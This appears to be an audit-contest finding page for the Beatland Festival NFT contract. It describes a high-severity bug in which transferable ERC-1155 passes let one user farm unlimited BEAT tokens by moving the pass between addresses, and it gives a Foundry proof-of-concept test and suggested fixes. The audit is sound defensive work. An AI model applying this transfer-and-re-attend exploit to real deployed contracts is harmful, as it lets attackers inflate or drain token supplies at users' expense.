Beatland Festival

First Flight #44

Beginner FriendlyFoundrySolidityNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Transferable Pass Exploit: Unlimited BEAT Minting

jufel

Description:
Passes (IDs 1–3) are implemented as a standard ERC-1155 token with no transfer restrictions. Attendance (“check-in”) is tracked by address (hasAttended[performanceId][msg.sender]) and cooldown (lastCheckIn[msg.sender]). An attacker can repeatedly transfer their pass to fresh addresses to bypass both the “already attended” and cooldown guards, calling attendPerformance multiple times within a single performance period and minting unlimited BEAT tokens.

Impact:
An attacker can drain the BEAT token supply (or inflate it arbitrarily), breaking the festival’s token economy and undermining all downstream memorabilia redemption.

Proof of Concept: Add the following test to the 'FestivalPass.t.sol' file:

function testUnlimitedMintViaTransfer() public {

// user1 buys a general pass

vm.prank(user1);

festivalPass.buyPass{value: GENERAL_PRICE}(1);

// Organizer creates a performance

uint256 startTime = block.timestamp + 1 hours;

vm.prank(organizer);

uint256 perfId = festivalPass.createPerformance(startTime, 2 hours, 1e18);

// Warp to performance time

vm.warp(startTime + 30 minutes);

// user1 attends

vm.prank(user1);

festivalPass.attendPerformance(perfId);

assertEq(beatToken.balanceOf(user1), 1e18);

// user1 transfers her pass to user2

vm.prank(user1);

festivalPass.safeTransferFrom(user1, user2, 1, 1, "");

// user2 attends and mints again

vm.prank(user2);

festivalPass.attendPerformance(perfId);

assertEq(beatToken.balanceOf(user2), 1e18);

// user2 transfers it back to user1

vm.prank(user2);

festivalPass.safeTransferFrom(user2, user1, 1, 1, "");

// user2 attends and mints again, transferring to user1 after, and so on

}

Mitigation:
– Make passes non-transferable (soulbound) by overriding _beforeTokenTransfer to block all transfers except mint/burn.
– Or track attendance per token ID (not per address).

Updates

Lead Judging Commences

inallhonesty Lead Judge 26 days ago

Submission Judgement Published

Validated

Assigned finding tags:

Unlimited beat farming by transferring passes to other addresses.

Rewards breakdown

nSLOC

234

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.